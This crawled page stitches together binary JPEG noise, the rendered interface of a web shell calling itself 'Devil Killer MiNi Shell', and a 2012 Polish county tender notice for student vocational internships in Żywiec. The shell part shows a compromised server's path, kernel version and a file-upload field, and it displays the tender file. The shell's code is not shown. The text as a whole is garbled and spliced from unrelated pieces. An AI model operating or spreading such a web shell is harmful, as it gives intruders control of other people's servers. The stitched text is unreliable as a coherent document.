JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/209264-N-2012.html

<p class="kh_header"><b>Żywiec: Zorganizowanie praktyk zawodowych na rzecz uczniów szkół ponadgimnazjalnych będących uczestnikami projektu pt. Mam zawód-mam pracę w regionie</b><br>
<b>Numer ogłoszenia: 209264 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Krasińskiego 13, 34-300 Żywiec, woj. śląskie, tel. 033 8612424, faks 033 8614623.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.zywiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie praktyk zawodowych na rzecz uczniów szkół ponadgimnazjalnych będących uczestnikami projektu pt. Mam zawód-mam pracę w regionie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa zorganizowania praktyk zawodowych dla maksymalnie 112 uczniów szkół ponadgimnazjalnych, dla których  Powiat Żywiecki jest organem prowadzącym, będących uczestnikami  projektu pt. Mam zawód - mam pracę w regionie realizowanego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki 2007-2013 przez Samorząd Województwa Śląskiego we współpracy ze Śląskim Kuratorem Oświaty oraz powiatami i miastami na prawach powiatu z terenu województwa śląskiego.
2.	Wykonawca zobowiązany jest zorganizować usługę stanowiącą przedmiot zamówienia w   przedsiębiorstwach lub instytucjach znajdujących się na terenie Powiatu Żywieckiego lub powiatów ościennych. 
3.	Przedmiot zamówienia obejmuje:
-  zorganizowanie poszczególnych praktyk, zgodnie z programem opisanym w punkcie 6
-  opiekę nad uczestnikami praktyk w toku ich odbywania,
-  zapewnienie odpowiednich warunków technicznych praktyk oraz warunków bhp,
- zagwarantowanie przeprowadzenia praktyk zgodnie z programem poszczególnych praktyk o których mowa w punkcie 6,
- ubezpieczenie każdego z uczestników praktyk na koszt wykonawcy.
4.	Usługa zorganizowania praktyk zawodowych przeprowadzona będzie za na rzecz uczniów,  będących uczestnikami projektu Mam zawód - mam prace w regionie kształcących się w:
1)	Technikum nr 1 na kierunkach: technik elektryk, elektronik, mechanik, mechatronik, teleinformatyk, informatyk, należącym do Zespołu Szkół Mechaniczno - Elektrycznych w Żywcu ul Komisji Edukacji Narodowej 3.
2)	Zasadniczej Szkole Zawodowej nr 1 w zawodach: elektryk, operator obrabiarek skrawających, należącej do Zespołu Szkół Mechaniczno - Elektrycznych w Żywcu ul. Komisji Edukacji Narodowej 3.
3)	Technikum nr 5 na kierunkach: technik pojazdów samochodowych, należącym do Zespołu Szkół Samochodowych w Żywcu ul. Grunwaldzka 10.
4)	Zasadniczej Szkole Zawodowej nr 4 w zawodzie: mechanik pojazdów samochodowych, elektromechanik pojazdów samochodowych  należącej do Zespołu Szkół Samochodowych w Żywcu ul. Grunwaldzka 10.
5)	Technikum nr 6 na kierunkach: technik hotelarstwa, żywienia i gospodarstwa domowego, obsługi turystycznej, hodowca koni należącego do Zespołu Szkół Agrotechnicznych i Ogólnokształcących Centrum Kształcenia Praktycznego im. Józefa Piłsudskiego w Żywcu ul. Moszczanicka 9.
6)	Zasadniczej Szkole Zawodowej w zawodach: kucharz malej gastronomii, mechanik - operator pojazdów i maszyn rolniczych należącej do Zespołu Szkół Agrotechnicznych i Ogólnokształcących Centrum Kształcenia Praktycznego im. Józefa Piłsudskiego w Żywcu ul. Moszczanicka 9. 
5.	W/w uczestnicy projektu zostaną przyporządkowani do poszczególnych praktyk zgodnie ze skierowaniem wydanym przez Zamawiającego.
6.	Program praktyk zawodowych:
1)	Zorganizowanie praktyk zawodowych na kierunkach:  Technik żywienia, Technik hotelarstwa, Technik hodowca koni - agroturystyka, Mechanik operator pojazdów i maszyn rolniczych.

I. Program  - Technik żywienia - praktyki zawodowe

1.	Zapoznanie i obsługa maszyn i urządzeń gastronomicznych.
2.	 Produkcja potraw i napojów zgodnie z wymaganiami CKE stosowanymi podczas egzaminu zawodowego.
3.	Planowanie i rozliczanie produktów.
4.	Zapoznanie z zasadami HACCP (pełną księgą)
5.	Stosowanie w praktyce systemów HACCP, GMP i GHP.
6.	Zapoznanie z organizacją pracy z uwzględnieniem układu funkcjonalnego zakładu.
7.	Układanie i ocena jadłospisów.
8.	Poznanie systemów komputerowych stosowanych gastronomii.
9.	Zdobywanie umiejętności dekorowania potraw.
10.	Pisanie projektów typu egzaminacyjnego (egzamin zawodowy) z zachowaniem procedur CKE.
Wymogi:
1.	zapewnie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki,
2.	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca,
3.	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.

Wymiar godzin: około 80 godzin. Ilość uczestników: około 9 uczniów.

II. Program  - Technik hotelarstwa- praktyki zawodowe

1.	Zadania, organizacja i technika pracy w recepcji:
	Przyjmowanie gości zgodnie z procedurą zameldowania check-in gości indywidualnych i grup zorganizowanych według standardów egzaminacyjnych,
	Procedura wymeldowania check-out  gości indywidualnych i grup zorganizowanych według standardów egzaminacyjnych, 
	Zapoznanie z dokumentacją recepcji dotyczącą kompleksowej obsługi gościa zgodnie ze standardami egzaminacyjnymi,
	Poznanie systemów komputerowych stosowanych w hotelarstwie i gastronomii hotelowej: CHART, FIDELIO, GASTRO POS, GASTRO SZEF,
2.	Technika pracy pięter:
	Technika pracy w dziale utrzymania czystości i porządku housekeeping,
	Stosowanie standardów wyposażenia jednostki mieszkaniowej,
	Poznanie wymogów kategoryzacyjnych części mieszkalnej
	Odpowiedzialność pracownika za rzeczy znalezione, oraz pozostawione przez gości.
3.	Rodzaje usług występujących w hotelach:
	Zapoznanie ze świadczonymi przez hotel usługami (płatnymi i niepłatnymi)
	Zapoznanie się z zakresem usług dodatkowych.
4.	Administracja hotelowa:
	Zapoznanie z organizacją i techniką pracy sekretariatu,
	Zapoznanie się z zadaniami działu ekonomicznego, księgowego i marketingu.
5.	Technika pracy działu gastronomicznego:
	Zapoznanie się z organizacją gastronomii hotelowej
	Zapoznanie się z urządzeniami i maszynami gastronomicznymi,
	Zapoznanie się z obowiązkami pracowników działu gastronomicznego.
Wymogi:
1.	zapewnienie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki,
2.	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca,
3.	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 9 uczniów.

III. Program  - Technik hodowca koni agroturystyka- praktyki zawodowe

Podczas praktyk uczniowie uczestniczą w pracach związanych z:
- rozpoznawaniem pożytecznej roślinności łąkowej
- zbiorem, konserwacją i przechowywaniem  pasz pochodzących z użytków zielonych
-organizacją gospodarki pastwiskowej
- rozwiązywaniem zadań typu  egzaminu praktycznego z zachowaniem procedur  CKE
- codzienną pielęgnacja koni(czyszczenie koni, mycie, zabiegi upiększające)
- okresową pielęgnacją koni( zabiegi weterynaryjne, rozczyszczanie kopyt)
- przygotowaniem konia do jazdy konnej( siodłanie, kiełznanie )
- zapoznaniem się z procedurami organizacji zawodów konnych( przygotowanie ośrodka oraz etapy treningu konia i zawodnika  do pokonania parkuru podczas zawodów konnych) 
-  opieka nad stajnią( codzienne prace związane z utrzymanie czystości i higieny  w stajni, żywienie koni, )
Wymogi w stosunku do  miejsca przeprowadzenia praktyk:
- minimum 5 koni,
- prowadzenie własnej produkcji pasz,
- posiadanie  parkuru zgodnego z przepisami PZJ,
- zapewnienie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki,
- ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca
- każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek,
- zakwaterowanie i wyżywienie młodzieży w czasie praktyki oraz zapewnienie opieki osoby z uprawnieniami w czasie wolnym.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 8 uczniów.

IV. Program - Mechanik operator pojazdów i maszyn rolniczych- praktyki zawodowe

- Zapoznanie i uczestnictwo w zbiorze roślin uprawnych.
- Obsługa maszyn i ciągników podczas zbioru zielonki i siana.
-Obsługa codzienna ciągników rolniczych.
-Przygotowanie maszyn do pracy.
-Zapoznanie z technologią zbioru sianokiszonki.
-Konserwacja sprzętu rolniczego.
-Wykonywanie drobnych napraw maszyn rolniczych i ciągników.
Wymogi:
1.	Zapewnienie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki.
2.	Prowadzenie własnej produkcji pasz.
3.	Posiadanie odpowiedniego parku maszynowego.
4.	Ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa Wykonawca.
5.	Każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 8 uczniów.


2)	Zorganizowanie praktyk zawodowych w branżach: elektryczno - elektronicznej, mechaniczno - mechatronicznej, informatyczno - teleinformatycznej.

I. Branża elektryczno-elektroniczna - Praktyka powinna obejmować:
-	poznanie struktury organizacyjnej firmy,  
-	instalowanie urządzeń elektrycznych lub elektronicznych,
-	uruchamianie urządzeń elektrycznych lub elektronicznych,
-	zapoznanie się z organizacją i zadaniami działu produkcji,
-	nadzorowanie pracy urządzeń, 
-	dokonywanie okresowych konserwacji,
-	lokalizowanie i usuwanie usterek.
Wymogi:
-	zapewnie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki.
-	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca.
-	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 24 uczniów.


II. Branża mechaniczno - mechatroniczna - Praktyka powinna obejmować:
-	poznanie struktury organizacyjnej firmy,  
-	instalowanie urządzeń mechanicznych lub mechatronicznych,
-	uruchamianie urządzeń mechanicznych lub mechatronicznych,
-	zapoznanie się z organizacją i zadaniami działu utrzymania ruchu,
-	dokonywanie okresowych konserwacji,
-	lokalizowanie i usuwanie usterek.
Wymogi:
-	zapewnie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki,
-	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca,
-	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 20 uczniów.

III. Branża informatyczno - teleinformatyczna - Praktyka powinna obejmować:
-	zapoznanie się ze strukturą organizacyjną firmy,  
-	konfigurowanie sprzętu komputerowego i oprogramowania,
-	budowa i rozbudowa sieci komputerowych,
-	obsługa oprogramowania systemowego i użytkowego,
-	organizacja pracy przy projektowaniu i programowaniu .
Wymogi:
-	zapewnie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki,
-	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca,
-	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 12 uczniów.

3)	 Zorganizowanie praktyk zawodowych w branży samochodowej.

Program praktyk samochodowych:
Praktyka powinna być zorganizowana w przedsiębiorstwach :
- 16 miejsc - w przedsiębiorstwie transportowym dysponującym co najmniej 50 zespołami ( ciągnik samochodowy z naczepą ), w którym możliwe jest odbycie praktyki nieodpłatnej, obserwacji na stanowiskach: 
a. ) Dyspozytornia.
Zapoznanie się z organizacja pracy kierowców i firmy transportowej jako całości,
b. ) Stacja palie.
Zapoznanie z zasadami zaopatrzenia i rozliczania paliw.
c. ) Stacja obsługi pojazdów.
Zapoznanie z organizacja obsługi pojazdów, badań diagnostycznych i napraw bieżących, w dużym przedsiębiorstwie transportowym.
d. ) Magazyn części zamiennych.
Organizacja pracy magazynu, zasady identyfikacji, zamawiania i dystrybucji części zamiennych i materiałów.
- 4 miejsca - zakład produkcyjny branży samochodowej, w którym możliwe jest odbycie praktyki obserwacyjnej na stanowiskach:
a. ) Narzędziowiec.
Zapoznanie z organizacją pracy narzędziowni, z zasadami doboru, sprawdzania narzędzi.
b. ) Dział kontroli technicznej.
Zapoznanie z zakresem obowiązków kontroli technicznej w zakładzie i prowadzona dokumentacją, oraz system kontroli jakości obowiązującym w zakładzie.
c. ) Działy produkcyjne.
Zapoznanie z organizacją pracy w poszczególnych działach produkcyjnych.
d. ) Dział zaopatrzenia.
Zapoznanie z organizacją zaopatrzenia i zasadami gospodarki magazynowej obowiązującej w zakładzie.
Wymogi:
-	zapewnie opieki osoby posiadającej uprawnienia pedagogiczne w czasie trwania praktyki.
-	ubezpieczenie uczniów uczestniczących w praktykach, którego koszty pokrywa wykonawca.
-	każdy uczestnik praktyk otrzyma w ciągu dnia praktyk gorący posiłek.
Wymiar godzin: około 80 godzin. Ilość uczestników: około 20 uczniów.

7.	Wykonawca  przed podpisaniem umowy z Zamawiającym jest zobowiązany przedstawić pisemne zgody zakładów/instytucji w których odbywać się będą praktyki na przeprowadzanie praktyk w tych miejscach, w terminie i na zasadach określonych w niniejszej specyfikacji.
8.	Wynagrodzenie wykonawcy wynikać będzie z liczby uczniów którzy faktycznie odbyli praktyki zawodowe wg. kosztu zorganizowania praktyki dla jednego ucznia.
9.	Wykonawca zobowiązany jest do realizacji przedmiotu zamówienia na terenie Powiatu Żywieckiego lub powiatów ościennych.
10.	Wykonawca zobowiązany jest realizować przedmiotową usługę w godzinach od 8:00 do 18:00 w dniach od poniedziałku do piątku ( z wyjątkiem dni ustawowo wolnych od pracy), według harmonogramu ustalonego i zatwierdzonego przez  Zamawiającego, dostosowanego do planu zajęć uczniów.
11.	Wykonawca zobowiązany jest do przedłożenia zamawiającemu harmonogramu praktyk w terminie 5 dni od daty podpisania umowy.
12.	W zależności od potrzeb Zamawiającego Wykonawca winien być gotowy do świadczenia usług również w soboty.
13.	Wykonawca zobowiązany jest do sporządzania i prowadzenia dokumentacji wykonanych usług na zasadach i w formie wskazanej przez Zamawiającego. Wykonawca zobowiązany jest do przekazywania zamawiającemu kserokopii następujących dokumentów:
a)	lista obecności podpisywana na każdy dzień praktyk,
b)	program praktyk,
c)	harmonogram praktyk,
d)	dziennik praktyk potwierdzający udział uczestników w praktykach,
e)	rejestr potwierdzeń odbioru zaświadczeń o odbytych praktykach i nabytych podczas nich umiejętności,
f)	 po pomyślnym zaliczeniu praktyk wydanie certyfikatu.
14.	Dokumenty o których mowa pkt. II 13. powinny być potwierdzone przez Wykonawcę za zgodność z oryginałem. Sporządzona dokumentacja powinna być odpowiednio oznaczona logotypami Unii Europejskiej, Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki oraz logo Starostwa Powiatowego w Żywcu, zgodne z wytycznymi z dnia 4 lutego 2008 roku Departamentu zarządzania Europejskim Funduszem Społecznym Ministra Rozwoju Regionalnego - podanymi na stronie internetowej www.efs.gov.pl. 
15.	Wykonawca wystawia rachunek (fakturę) za wykonaną usługę w podziale na:
- wynagrodzenie z tytułu zorganizowania i przeprowadzenia praktyk.
- koszty ubezpieczenia uczestników praktyki.
16.	W przypadku gdy Wykonawca zorganizuje praktykę poza terenem Miasta Żywiec, zobowiązany jest  do zorganizowania na własny koszt codziennego transportu, dla uczestników danej praktyki na trasie: Żywiec - miejsce praktyki - Żywiec. Wykonawca zobowiązany jest uwzględnić koszt transportu uczniów w cenie za zorganizowanie praktyki zawodowej dla 1 ucznia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający przewiduje obowiązek wniesienia wadium przed upływem terminu składania ofert, w wysokości 3 000,00 PLN. 
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Starostwa Powiatowego w Żywcu, na konto: Getin Noble Bank Oddział w Bielsku-Białej Filia w Żywcu 37 1560 1023 0000 9140 0000 0253. W tytule należy podać nr. sprawy WRiS.272.42.2012
4.	Wadium wnoszone w innej formie niż wyżej opisanej, należy składać w kasie Starostwa Powiatowego w Żywcu przy ul. Krasińskiego 13, I piętro, pok. nr 31. 
5.	Terminowe wniesienie wadium w formie pieniężnej oznacza, że żądana przez Zamawiającego kwota została wpłacona w pełnej wysokości przelewem na wskazany przez niego rachunek bankowy. Oznacza to, że wniesienie wadium w tej postaci jest skuteczne dopiero z chwilą uznania rachunku Zamawiającego kwotą wadium przed upływem terminu składania ofert.
6.	Wadium wnoszone w innych formach będzie wniesione w terminie, jeżeli stosowny dokument zostanie zdeponowany u Zamawiającego przed upływem terminu składania ofert.
7.	Wykonawca, którego oferta nie zostanie zabezpieczona wadium, zostanie wykluczony z postępowania, a jego oferta uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek wiedzy i doświadczenia oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym załącznik Nr 2 do Specyfikacji, że posiada wiedzę i doświadczenie zapewniające wykonanie przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oceniony zostanie na podstawie złożonego wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy  na druku stanowiącym załącznik Nr 4 do Specyfikacji, że dysponuje - (samodzielnie bądź udostępnionymi przez inne podmioty) zakładami/instytucjami,  w których odbywać się będą praktyki zawodowe.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia zostanie oceniony na podstawie złożonego przez Wykonawcę oświadczenia. Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy na druku stanowiącym załącznik Nr 2 do Specyfikacji, że dysponuje osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie złożonego oświadczenia. Warunek zostanie uznany za spełniony, jeżeli wykonawca oświadczy na druku stanowiącym załącznik Nr 2 do Specyfikacji, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie przedmiotu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
